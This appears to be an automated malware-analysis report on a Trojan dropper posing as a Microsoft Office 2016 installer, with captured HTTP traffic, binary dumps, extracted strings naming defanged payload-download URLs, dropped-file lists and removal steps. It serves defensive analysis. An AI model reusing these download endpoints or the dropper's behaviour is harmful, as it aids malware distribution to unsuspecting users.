t-IIS/8.5..X-Powered-By: PHP/5.3.28..Set-Cookie: PHPSESSID=v0bn1urf6tq
st2lj3ogatho5h6; path=/..Set-Cookie: a862a6096792e35ad3375e3a94312fe4b
a1df5aa=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wiY2FtcGFpZ
25zXCI6e1wiMVwiOjE1MjMzNDEzNjN9LFwidGltZVwiOjE1MjMzNDEzNjN9In0.NcuBqk7
4QFlc1AADR78uMKoGC7sniqdj7Z_9MC7m-fY; expires=Fri, 11-May-2018 06:22:4
6 GMT; path=/; domain=.kiss.oatmealscene.loan..Date: Tue, 10 Apr 2018 
06:22:45 GMT..Content-Length: 0..

GET /normal_bg4.png HTTP/1.1

Accept: */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: d2adi7hu49xk5t.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: image/png

Content-Length: 63855

Connection: keep-alive

Date: Sun, 19 Nov 2017 03:31:01 GMT

Last-Modified: Wed, 25 Oct 2017 07:20:00 GMT

ETag: "0f4f3c2685f4c75717b342a34fe59423"

Accept-Ranges: bytes

Server: AmazonS3

Age: 6098

X-Cache: Hit from cloudfront

Via: 1.1 13adfd3cd52fe37e43fe8d963a13d770.cloudfront.net (CloudFront)

X-Amz-Cf-Id: cc4sx98bd3tJ8PPWNaZUCrsDBDdXvlR1dufh2rG5njzqJ-TjBiYkuw==
.PNG........IHDR...E.................PLTE.............................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
.....................g.....Z.................q...........O............
.._............................................d......................
......................l.....t........>........|........a.....B.....
j..U.....D.................G..5y..........ClP=...*IDATx...A..0....pn.3
t?..u...l..!....ofQh...R..`..T......I..&..dIO3......].....La.!..0E..X.
T..@.&.JVC.|...V.E.SV.K.^.V......"....T=f.3I ..Z.n~O...]..T...6..<.
....ze|1.r*..../:.....Nje6.1..>.#.9..p.. \!.......,.(..[..5a-F..Z..
...!......0...=..R...'...W.....(.H...:..9.h..$G.....f.D>1G8.@....V4
P.Z..A...Y{JR..........G..1".H...BsI.2G..3%......".L....c....}H..(.."U
>.....w.Z.k.q....k.p<.Q$bi..i.*.......x....l...SCv.....<.0D.5
)>...r..2ERo..>=?...c..~.b...F//._.k....~.~g..~d....0c.G...R....
.t..y'.....e....K.k..?t..k.p..q...M..<. R.Sm.9...R.A.X..tY...*...FL
..>.. .0D..:V..-.L.2....X.c0.&~...Y.}7O.........j. .E..E?[Q.'...;w.
....#T......W.#..... 3.t.......T*u..#.r..c*......a..n.y]WU]7T5..;.<<< skipped >>>

GET hXXp://lip.healthcakes.men/offer.php?affId=1006&trackingId=336034551&instId=11&ho_trackingid=HO336034551&cc=UA&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3&net=4.5.50709&ie=9.0.8112.16421&res=1276x846&osd=1601 HTTP/1.1

Host: lip.healthcakes.men

Connection: close

Accept: */*

User-Agent: InstallCapital


HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8

Content-Length: 1936

Connection: close

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Server: Microsoft-IIS/8.5

X-Powered-By: PHP/5.3.28

Set-Cookie: PHPSESSID=5ov882bm7vq5df7jc1i2jko690; path=/

Set-Cookie: a862a6096792e35ad3375e3a94312fe4ba1df5aa=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wiY2FtcGFpZ25zXCI6e1wiMVwiOjE1MjMzNDEzNjF9LFwidGltZVwiOjE1MjMzNDEzNjF9In0.L7TibYFb2iXT8_maK2fQtsi7dovoKKFZMlsECMOviwg; expires=Fri, 11-May-2018 06:22:43 GMT; path=/; domain=.lip.healthcakes.men

Date: Tue, 10 Apr 2018 06:22:43 GMT

X-Cache: Miss from cloudfront

Via: 1.1 d8c162bb2dd82a85311051ee4bb3f5d2.cloudfront.net (CloudFront)

X-Amz-Cf-Id: M4cbPci_b3c-3Y4bDtTsEUeSPkjMOJYlqeTazJCXkKClWJlVpIAgRg==
..*d.h..@0.. ...|..OEu.`.......B..p`.(F.hP...R...G....t..j^...........
T... .R5o)......q[.-.H......C...;(.p..Pkn..).].&...0l.$s"........iD.M.
....h..7..WjT.8F .Z.;9FM.}[....Y .v....a...2.1xYM.....C.....M.(.......
.......l...|(..l=..(..K.5.....^E..W.^.~.&9..........|i...;a.K..{S.....
.~y..jo.\.k4...U@.z.....|b....2...Q.d.?.$...Y..&..A.ZT.C.W ..\.....v;.
..../S....]nv..k...8#z...$..~G9..TH.`M......O..H.:"v....|.....l.)@c.f|
B..HTY.^.....Ny{ (.(....;4...d..vV..`.N......,B.H.........o8]....S.9..
{9 .e......hj.....6l.E^.....d...1z.bpo-.v.;.h]Z.B._.jY#5.w|....s....V.
 .."~EW.)...M..%.;$u1.-Lu%F..c.)."P.`..8..1P=!..X.J...Vy..'.0.. ......
..z.b..E.z.".7...@.......Y..gM..M..u5....)m..R.h~G..kr......u...v$..z,
KQ.Na.B...O.....i.>]......P..#.....w.".....$.)....... -.c...Z..<
.|...k...........\.....'.~.....3.I..."..0':..X...B.sw.{..M..^...'/[Ajy
.P<.a..J...9.Q.....f...`y..^O...cJ.....2....1-.....C.3..?.....X...1
z......:.0...S...O.Sn.,|..F.{..h.....k>.uP..L..W.C..x5a...f..~P....
..g...)i..F...PL.Zz......."...8...W8..N.2..E.S.8[qm._0(..@...@D2{P.N~o
..o.3.....L..6Z.H l.A}.o~..!..........l...t9.=..........=.r.buZV.f..._
.b.G..?n....gfJ..G...z.t....i..".{.'...j^...ArL... ......o..u..F{|S...
shUS.. ..p.w.....E.7..!B....U.z......%~fw!......c .v........@r.$ka.t..
.q..r...3~.Hl....yv....V..g...e....OEJ...G..Vh.....H..q...0V<....i.
h....o..%F......P.i.n.......,. ;w@]..........RG}...%8...F.[./.$. V....
.>IP'.[X....A....l..0.R$D........t/..B.N9...*..x3-.B.r.<....B...
..K.'......}.XZ.Q...........:H.R"%5..k.'@8:oP..H.$..1Hz......D...k<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_4000:

.text

`.rdata

@.data

.ndata

.rsrc

uDSSh

hu2.iu

.DEFAULT\Control Panel\International

Software\Microsoft\Windows\CurrentVersion

GetWindowsDirectoryA

KERNEL32.dll

ExitWindowsEx

USER32.dll

GDI32.dll

SHFileOperationA

ShellExecuteA

SHELL32.dll

RegEnumKeyA

RegCreateKeyExA

RegCloseKey

RegDeleteKeyA

RegOpenKeyExA

ADVAPI32.dll

COMCTL32.dll

ole32.dll

VERSION.dll

verifying installer: %d%%

hXXp://nsis.sf.net/NSIS_Error

... %d%%

~nsu.tmp

%u.%u%s%s

RegDeleteKeyExA

%s=%s

*?|<>/":

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9C.tmp\setup.exe

d=18778101&pid=539&b_typ=pe&reb=1&name=MICROSOFT Office PRO Plus 2016 v16.0.4229.1020 Final Nov.Update

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9C.tmp\B->C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9C.tmp\setup.exe

ip&tid=18778101&pid=539&b_typ=pe&reb=1&name=MICROSOFT Office PRO Plus 2016 v16.0.4229.1020 Final Nov.Update

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9C.tmp\B

etc.dll

Thawte Certification1

hXXp://ocsp.thawte.com0

.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0

hXXp://ts-ocsp.ws.symantec.com07

 hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0<

 hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(

DigiCert Inc1

VVV.digicert.com1 0)

"DigiCert High Assurance EV Root CA0

DhXXp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0

VVV.digicert.com1200

)DigiCert High Assurance Code Signing CA-10

(hXXp://crl3.digicert.com/ha-cs-2011a.crl0.

(hXXp://crl4.digicert.com/ha-cs-2011a.crl0

.hXXp://VVV.digicert.com/ssl-cps-repository.htm0

hXXp://ocsp.digicert.com0P

DhXXp://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0

hXXp://ocsp.digicert.com0I

=hXXp://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0

:hXXp://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0@

:hXXp://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0

)DigiCert High Assurance Code Signing CA-1

1f.WU

System.dll

callback%d

@.reloc

u.Uj@

MSVCRT.dll

HttpSendRequestA

HttpSendRequestExA

HttpQueryInfoA

FtpCreateDirectoryA

FtpOpenFileA

HttpOpenRequestA

HttpAddRequestHeadersA

HttpEndRequestA

InternetCrackUrlA

WININET.dll

inetc.dll

Open URL Error

URL Parts Error

FtpCreateDir failed (550)

Error FTP path (550)

Downloading %s

%dkB (%d%%) of %dkB @ %d.dkB/s

(%d %s%s remaining)

REST %d

SIZE %s

Content-Length: %d

Content-Type: application/x-www-form-urlencoded

Authorization: basic %s

Proxy-authorization: basic %s

%s:%s

FtpCommandA

wininet.dll

%u MB

%u kB

%u bytes

%d:d:d

%s - %s

(Err=%d)

NSIS_Inetc (Mozilla)

Filename: %s

/password

Uploading %s

9!9-9B9}9

.reloc

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9C.tmp

nsb5D9C.tmp

s\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9C.tmp\setup.exe

ROSOFT Office PRO Plus 2016 v16.0.4229.1020 Final Nov.Update

\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9C.tmp\VVBX80bLVD

p&tid=18778101&pid=539&b_typ=pe&reb=1&name=MICROSOFT Office PRO Plus 2016 v16.0.4229.1020 Final Nov.Update

ke.needmonth.bid/stub_maker.php?program=sevenzip&tid=18778101&pid=539&b_typ=pe&reb=1&name=MICROSOFT Office PRO Plus 2016 v16.0.4229.1020 Final Nov.Update

c:\%original file name%.exe

%original file name%.exe

ers\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9B.tmp

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\

201804100622

hXXp://ake.needmonth.bid/stub_maker.php?program=sevenzip&tid=18778101&pid=539&b_typ=pe&reb=1&name=MICROSOFT Office PRO Plus 2016 v16.0.4229.1020 Final Nov.Update

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>

RAny use of this Certificate constitutes acceptance of the DigiCert CP/CPS and the Relying Party Agreement which limit liability and are incorporated herein by reference

%original file name%.exe_4000_rwx_10004000_00001000:

callback%d

iexplore.exe_2612:

.text

`.data

.rsrc

@.reloc

>.uzf

.us;}

IEFRAME.dll

MLANG.dll

iertutil.dll

urlmon.dll

ole32.dll

SHELL32.dll

SHLWAPI.dll

msvcrt.dll

USER32.dll

KERNEL32.dll

ADVAPI32.dll

RegOpenKeyExW

RegCloseKey

GetWindowsDirectoryW

_amsg_exit

_wcmdln

UrlApplySchemeW

PathIsURLW

UrlCanonicalizeW

UrlCreateFromPathW

iexplore.pdb

KEYW

KEYWh

KEYWD

.ENNNG.

a.ry.v

l.igM4

?1%SGf

xh.JW^

.97777"7" " " !

3.... ))

8888888888888

8888888888

.lPV)

úW1

.ApX/

H.ZAf

ð[U

%s!FK

1YYYY1YY9GEAA=77YRNNNW:.VT1

888777777

Y.hilkRROMLK=C,

..(((($$

3...((((%

3....(.''$

3.2...((((%

33.2....(,'

55323222...

(%&'00443445?

00.,,,4(

000.,,9(

0020..9(

003200;(

(#'( (''''!'!

Microsoft.InternetExplorer.Default

user32.dll

Kernel32.DLL

xfire.exe

wlmail.exe

winamp.exe

waol.exe

sidebar.exe

psocdesigner.exe

np.exe

netscape.exe

netcaptor.exe

neoplanet.exe

msn.exe

mshtmpad.exe

mshta.exe

loader42.exe

infopath.exe

iexplore.exe

iepreview.exe

groove.exe

explorer.exe

dreamweaver.exe

contribute.exe

aol.exe

{28fb17e0-d393-439d-9a21-9474a070473a}

Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings

DShell32.dll

Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe

Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}

"%s" %s

Kernel32.dll

\AppPatch\sysmain.sdb

-extoff go.microsoft.com/fwlink/?LinkId=106323

-extoff go.microsoft.com/fwlink/?LinkId=106322

-extoff go.microsoft.com/fwlink/?LinkId=106320

kernel32.dll

{00000000-0000-0000-0000-000000000000}

\\?\Volume

shell:%s

Imaging_CreateWebPagePreview_Perftrack

Browseui_Tabs_Tearoff_BetweenWindows

Frame_URLEntered

Imaging_CreateWebPagePreview

WS_ExecuteQuery

Shdocvw_BaseBrowser_FireEvent_WindowStateChanged

IdleTask_Execution_Time

9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)

IEXPLORE.EXE

Windows

9.00.8112.16421

iexplore.exe_3384:

.text

`.data

.rsrc

@.reloc

>.uzf

.us;}

IEFRAME.dll

MLANG.dll

iertutil.dll

urlmon.dll

ole32.dll

SHELL32.dll

SHLWAPI.dll

msvcrt.dll

USER32.dll

KERNEL32.dll

ADVAPI32.dll

RegOpenKeyExW

RegCloseKey

GetWindowsDirectoryW

_amsg_exit

_wcmdln

UrlApplySchemeW

PathIsURLW

UrlCanonicalizeW

UrlCreateFromPathW

iexplore.pdb

KEYW

KEYWh

KEYWD

.ENNNG.

a.ry.v

l.igM4

?1%SGf

xh.JW^

.97777"7" " " !

3.... ))

8888888888888

8888888888

.lPV)

úW1

.ApX/

H.ZAf

ð[U

%s!FK

1YYYY1YY9GEAA=77YRNNNW:.VT1

888777777

Y.hilkRROMLK=C,

..(((($$

3...((((%

3....(.''$

3.2...((((%

33.2....(,'

55323222...

(%&'00443445?

00.,,,4(

000.,,9(

0020..9(

003200;(

(#'( (''''!'!

Microsoft.InternetExplorer.Default

user32.dll

Kernel32.DLL

xfire.exe

wlmail.exe

winamp.exe

waol.exe

sidebar.exe

psocdesigner.exe

np.exe

netscape.exe

netcaptor.exe

neoplanet.exe

msn.exe

mshtmpad.exe

mshta.exe

loader42.exe

infopath.exe

iexplore.exe

iepreview.exe

groove.exe

explorer.exe

dreamweaver.exe

contribute.exe

aol.exe

{28fb17e0-d393-439d-9a21-9474a070473a}

Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings

DShell32.dll

Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe

Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}

"%s" %s

Kernel32.dll

\AppPatch\sysmain.sdb

-extoff go.microsoft.com/fwlink/?LinkId=106323

-extoff go.microsoft.com/fwlink/?LinkId=106322

-extoff go.microsoft.com/fwlink/?LinkId=106320

kernel32.dll

{00000000-0000-0000-0000-000000000000}

\\?\Volume

shell:%s

Imaging_CreateWebPagePreview_Perftrack

Browseui_Tabs_Tearoff_BetweenWindows

Frame_URLEntered

Imaging_CreateWebPagePreview

WS_ExecuteQuery

Shdocvw_BaseBrowser_FireEvent_WindowStateChanged

IdleTask_Execution_Time

9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)

IEXPLORE.EXE

Windows

9.00.8112.16421

setup.exe_3488:

.text

`.rdata

@.data

.ndata

.rsrc

uDSSh

hu2.iu

.DEFAULT\Control Panel\International

Software\Microsoft\Windows\CurrentVersion

GetWindowsDirectoryA

KERNEL32.dll

ExitWindowsEx

USER32.dll

GDI32.dll

SHFileOperationA

ShellExecuteA

SHELL32.dll

RegEnumKeyA

RegCreateKeyExA

RegCloseKey

RegDeleteKeyA

RegOpenKeyExA

ADVAPI32.dll

COMCTL32.dll

ole32.dll

VERSION.dll

verifying installer: %d%%

hXXp://nsis.sf.net/NSIS_Error

... %d%%

~nsu.tmp

%u.%u%s%s

RegDeleteKeyExA

%s=%s

*?|<>/":

ers\"%CurrentUserName%"\AppData\Local\Temp\nslA6AC.tmp\InstallOptions.dll

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nslA6AC.tmp\InstallOptions.dll

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nslA6AC.tmp

llation of TAP-Windows, a kernel driver to provide virtual tap device functionality on Windows originally written by James Yonan.\r\n\r\nNote that the Windows version of TAP-Windows will only run on Windows XP or later.\r\n\r\n\r\n

.hh[;1

%SbI}M{

t-t}T

@.reloc

comdlg32.dll

InstallOptions.dll

PASSWORD

Field %d

All Files|*.*

1f.WU

TAP-Windows 9.21.0 Setup

nslA6AC.tmp

ows, a kernel driver to provide virtual tap device functionality on Windows originally written by James Yonan.\r\n\r\nNote that the Windows version of TAP-Windows will only run on Windows XP or later.\r\n\r\n\r\n

elcome to the TAP-Windows 9.21.0 Setup Wizard

ers\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9C.tmp\setup.exe

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9C.tmp\setup.exe

%Program Files%\TAP-Windows

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9C.tmp

setup.exe

ers\"%CurrentUserName%"\AppData\Local\Temp\nslA6AB.tmp

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\

to the TAP-Windows 9.21.0 Setup Wizard

1644822684

147483648

-2046754816

-2147410511

cc-dIbb%d

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>

setup.exe_3488_rwx_10004000_00001000:

callback%d

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):

v2kPpgYau1.exe:3084
cpSetup.exe:3888
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nslA6AC.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nslA6AC.tmp\modern-header.bmp (25 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nslA6AC.tmp\UserInfo.dll (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nslA6AC.tmp\ioSpecial.ini (4557 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nslA6AC.tmp\modern-wizard.bmp (26 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nslA6AC.tmp\InstallOptions.dll (30 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9C.tmp\inetc.dll (44 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\5acc58219a70e[1].exe (2888 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9C.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9C.tmp\B (4232 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9C.tmp\VVBX80bLVD (172 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\launcher[1].htm (172 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsb5D9C.tmp\v2kPpgYau1.exe (3705 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsq65E5.tmp\268275370 (313 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsq65E5.tmp\nsArray.dll (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsq65E5.tmp\cpSetup.exe (156691 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsq65E5.tmp\NSISdl.dll (30 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\normal_bg4[1].png (4541 bytes)
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.